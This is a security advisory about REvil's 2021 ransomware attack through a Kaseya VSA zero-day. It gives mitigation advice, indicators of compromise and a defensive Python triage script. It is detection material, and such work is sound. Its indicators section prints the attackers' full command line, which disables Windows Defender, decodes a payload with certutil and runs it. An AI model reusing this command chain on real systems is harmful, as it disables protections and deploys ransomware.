
Kaseya’s Virtual System/Server Administrator (VSA) Zero-Day Under Active Exploitation By REvil Ransomware

Kaseya is a US-based organization that provides IT and security management solutions for managed service providers (MSPs) and small to medium-sized businesses (SMBs) worldwide. One of its tools, Kaseya VSA, is under active exploitation and is being used as an attack vector to install REvil ransomware worldwide. Kaseya VSA (Virtual System/Server Administrator) is software that provides a centralized console to monitor and manage endpoints, automate IT processes, deploy security patches, and control access. It is available either as a hosted cloud service or via on-premises VSA servers.

On July 2nd, while Kaseya was in the process of fixing several zero-day vulnerabilities that had been reported to it privately, REvil ransomware operators started exploiting the zero-day vulnerabilities to deploy ransomware. Many companies whose networks were managed using Kaseya Virtual System Administrator (VSA) became victims of this large-scale ransomware attack. More than 1500 businesses worldwide are believed to be affected by this attack. The REvil ransomware group, however, claims to have encrypted over 1,000,000 systems worldwide in this attack. Researchers at the Dutch Institute for Vulnerability Disclosure (DIVD), who reported many of the zero-day vulnerabilities, believe that the vulnerability identified as CVE-2021-30116 is being used in these ransomware attacks. However, they have not provided any further details about the other vulnerabilities.

REvil Ransomware

REvil (Ransomware Evil), also known as Sodinokibi, operates as ransomware-as-a-service (RaaS), meaning anyone can buy the service and use the ransomware payload and infrastructure to manage victim communications and the distribution of decryption tools. REvil ransomware operators prefer to recruit affiliates to distribute the ransomware instead of attacking companies directly, and they split the revenue generated from ransom payments. Like many other ransomware families, REvil maintains a website where they publish details of their latest victims and the files collected from them. On their website page called ‘Happy Blog,’ REvil has confirmed that they were behind the attack against Kaseya and has demanded a ransom of 70 million dollars to decrypt files on all organizations affected by this attack.
As per one researcher, the REvil gang has now lowered its demand from 70 million dollars to 50 million dollars. REvil ransomware uses the Salsa20 symmetric stream cipher to encrypt data and an elliptic-curve asymmetric algorithm to encrypt the keys. The decryption of files affected by REvil is impossible without the operator’s keys.

CISA and FBI Advice

The US Cybersecurity and Infrastructure Security Agency (CISA) and Federal Bureau of Investigation (FBI) have shared an advisory for managed service providers (MSPs) and their customers impacted by this REvil ransomware attack. The MSPs affected by the attack are advised to check their systems for signs of compromise using Kaseya’s detection tool and to enable multi-factor authentication (MFA) on as many accounts as possible. MSPs should also implement allowlists to limit access to their internal assets and protect their remote monitoring tools’ admin interfaces using firewalls or VPNs. The complete list is given below.

  • Download the Kaseya VSA Detection Tool.
  • This tool analyzes a system (either a VSA server or a managed endpoint) and determines whether any indicators of compromise (IOCs) are present.
  • Enable and enforce multi-factor authentication (MFA) on every single account under the organization’s control, and, to the maximum extent possible, enable and enforce MFA for customer-facing services.
  • Implement allowlisting to limit communication with remote monitoring and management (RMM) capabilities to known IP address pairs, and/or
  • Place administrative interfaces of RMM behind a virtual private network (VPN) or a firewall on a dedicated administrative network.

CISA and the FBI also advise affected MSP customers to:

  • Ensure backups are up to date and stored in an easily retrievable location air-gapped from the organizational network.
  • Revert to a manual patch management process that follows vendor remediation guidance, including installing new patches as soon as they become available.
  • Implement MFA and the principle of least privilege on admin accounts for key network resources.

Indicators of Compromise

Security researchers at Huntress Labs have provided details on initial indicators of compromise for this attack.

Kaseya VSA Servers details of intrusion include:

  • Attackers uploaded agent.crt and Screenshot.jpg to exploited VSA servers, and this activity can be found in KUpload.log (which *may* be wiped by the attackers or encrypted by ransomware if a VSA agent was also installed on the VSA server).

  • A series of GET and POST requests using curl can be found within the KaseyaEdgeServices logs located in %ProgramData%\Kaseya\Log\KaseyaEdgeServices directory with a file name following this modified ISO8601 naming scheme KaseyaEdgeServices-YYYY-MM-DDTHH-MM-SSZ.log.

  • Attackers came from the following IP addresses using the user agent curl/7.69.1:
    18.223.199[.]234 (Amazon Web Services)
    161.35.239[.]148 (Digital Ocean)
    35.226.94[.]113 (Google Cloud)
    162.253.124[.]162 (Sapioterra)

  • The VSA procedure used to deploy the encryptor was named “Kaseya VSA Agent Hot-fix.” An additional procedure named “Archive and Purge Logs” was run by the attackers to clean up after themselves (screenshot here).

  • The “Kaseya VSA Agent Hot-fix” procedure ran the following:
    "C:\WINDOWS\system32\cmd.exe"
    /c ping 127.0.0.1 -n 4979 > nul &
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Set-MpPreference -DisableRealtimeMonitoring $true
    -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true
    -DisableScriptScanning $true -EnableControlledFolderAccess Disabled
    -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled
    -SubmitSamplesConsent NeverSend & copy /Y
    C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM%
    >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode
    c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f
    c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe

Kaseya VSA agent details of intrusion include:

  • Ransomware encryptors pushed via the Kaseya VSA agent were dropped in TempPath with the file name agent.crt and decoded to agent.exe. TempPath resolves to c:\kworking\agent.exe by default and is configurable within HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Kaseya\Agent\<unique id>

  • When agent.exe runs, the legitimate Windows Defender executable MsMpEng.exe and the encryptor payload mpsvc.dll are dropped into the hardcoded path “c:\Windows” to perform DLL sideloading.

  • The mpsvc.dll Sodinokibi DLL creates the registry key HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\BlackLivesMatter which contains several registry values that store encryptor runtime keys/configurations artifacts.

  • agent.crt – MD5: 939aae3cc456de8964cb182c75a5f8cc – Encoded malicious content

  • agent.exe – MD5: 561cffbaba71a6e8cc1cdceda990ead4 – Decoded contents of agent.crt

  • cert.exe – MD5: <random due to appended string> – Legitimate Windows certutil.exe utility

  • mpsvc.dll – MD5: a47cf00aedf769d60d58bfe00c0b5421 – REvil encryptor payload
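The indicator list above can be turned into a triage check that a responder runs on a VSA server or a managed endpoint. The script below is an added example written for this post; it is not code from SecPod, Huntress Labs or Kaseya. It hard-codes only the IPs, user agent, drop paths, MD5 hashes and registry key quoted above. The sample log lines and their format are constructed for illustration: real KaseyaEdgeServices-YYYY-MM-DDTHH-MM-SSZ.log files are laid out differently, so adjust the line parsing before pointing it at them.

```python
"""Host triage against the Kaseya VSA / REvil indicators quoted above.

Added example (not from the page's author, Huntress Labs or Kaseya). The
sample log line format is constructed; real KaseyaEdgeServices logs differ.
"""
import hashlib
import re
import sys
from pathlib import Path

# Indicators exactly as listed on the page (IPs un-defanged for matching).
SOURCE_IPS = {"18.223.199.234", "161.35.239.148", "35.226.94.113", "162.253.124.162"}
USER_AGENT = "curl/7.69.1"
KNOWN_MD5 = {
    "939aae3cc456de8964cb182c75a5f8cc": "agent.crt (encoded REvil payload)",
    "561cffbaba71a6e8cc1cdceda990ead4": "agent.exe (decoded agent.crt)",
    "a47cf00aedf769d60d58bfe00c0b5421": "mpsvc.dll (REvil encryptor)",
}
# Drop locations from the page; cert.exe has no fixed hash (random bytes appended).
ARTIFACT_PATHS = [
    r"c:\kworking\agent.crt",
    r"c:\kworking\agent.exe",
    r"c:\Windows\cert.exe",
    r"c:\Windows\mpsvc.dll",
]
REGISTRY_KEY = r"SOFTWARE\WOW6432Node\BlackLivesMatter"

IP_RE = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3})\b")


def defang(ip):
    """Render an IP the way the page does (last dot bracketed) so hits paste safely."""
    head, _, last = ip.rpartition(".")
    return f"{head}[.]{last}"


def scan_edge_log(lines):
    """Flag log lines carrying a known source IP or the curl/7.69.1 user agent."""
    hits = []
    for number, line in enumerate(lines, 1):
        ips = set(IP_RE.findall(line))
        reasons = []
        if ips & SOURCE_IPS:
            reasons.append("known attacker source IP")
        if USER_AGENT in line:
            reasons.append("curl/7.69.1 user agent")
        if reasons:
            # Prefer a listed IP; otherwise report whatever IP the line carries.
            ip = sorted((ips & SOURCE_IPS) or ips or {"?"})[0]
            hits.append({"line": number, "ip": ip, "reasons": reasons})
    return hits


def classify_artifact(path, md5=None):
    """Match a file against the hash list first, then against the known drop paths."""
    if md5 and md5.lower() in KNOWN_MD5:
        return KNOWN_MD5[md5.lower()]
    normalized = path.replace("/", "\\").lower()
    if normalized in (p.lower() for p in ARTIFACT_PATHS):
        return f"file present at known drop path (hash {md5 or 'n/a'} not in list)"
    return None


def md5_of(path):
    """MD5 of a file, read in chunks so large payloads do not load into memory."""
    digest = hashlib.md5()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 20), b""):
            digest.update(chunk)
    return digest.hexdigest()


def triage_host(paths=ARTIFACT_PATHS):
    """Hash and classify any indicator files present on this host; check the registry key on Windows."""
    findings = []
    for p in paths:
        if Path(p).is_file():
            label = classify_artifact(p, md5_of(p))
            if label:
                findings.append((p, label))
    if sys.platform == "win32":
        import winreg  # Windows only: the encryptor's runtime configuration key
        try:
            winreg.CloseKey(winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, REGISTRY_KEY))
            findings.append(("HKLM\\" + REGISTRY_KEY, "REvil runtime registry key present"))
        except OSError:
            pass
    return findings


# Constructed sample lines (format invented for this example, not real Kaseya output).
SAMPLE_LOG = [
    '2021-07-02T18:11:05Z GET /login from 18.223.199.234 ua="curl/7.69.1"',
    '2021-07-02T18:11:06Z POST /upload from 18.223.199.234 ua="curl/7.69.1"',
    '2021-07-02T18:12:40Z GET /login from 10.0.0.25 ua="Mozilla/5.0"',
    '2021-07-02T18:13:02Z POST /upload from 203.0.113.7 ua="curl/7.69.1"',
]

if __name__ == "__main__":
    for hit in scan_edge_log(SAMPLE_LOG):
        print(f"line {hit['line']}: {defang(hit['ip'])} -> {', '.join(hit['reasons'])}")
    for path, label in triage_host():
        print(f"{path}: {label}")
```

Run as-is it only scans the constructed sample, reporting three of the four lines. On a real VSA server, feed `scan_edge_log` the lines of each file matching `KaseyaEdgeServices-*.log` under `%ProgramData%\Kaseya\Log\KaseyaEdgeServices`, and treat any `triage_host` finding as a reason to isolate the machine before anything else, since a present `agent.crt` or `mpsvc.dll` means the procedure already ran.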


Affected Applications

All versions of On-Premises Virtual System/Server Administrator (VSA)


Global impact

This has been the largest ransomware attack on record, affecting close to 1500 of Kaseya’s clients spread across 17 countries. The full impact of the attack is still being analysed by cybersecurity professionals globally.

Huntress Labs, which has been closely monitoring this situation as it unfolds, reported that 30 MSPs were affected, consequently affecting thousands of dependent businesses.

Some events as per news reports:

  • One of the most significant impacts was when 800 stores of the Swedish supermarket chain Coop had to be closed after their cash registers were disabled during the attack. Swedish state railway services and a prominent pharmacy chain were also affected to varying degrees by the attack.
  • 100 kindergartens in New Zealand had their computers disabled, and 9 schools have also been affected in some manner.

As per Kaseya’s status webpage:

“All VSA SaaS servers will be put into maintenance mode. We apologize for any inconvenience. – Kaseya Cloud Operations Team”


Solution

Kaseya has advised all on-premises customers to keep VSA servers offline until a patch is available. Kaseya has also stated that the on-premises patch timeline is 24 hours (or less) from the restoration of SaaS services. Kaseya is also in the process of bringing its SaaS servers online.
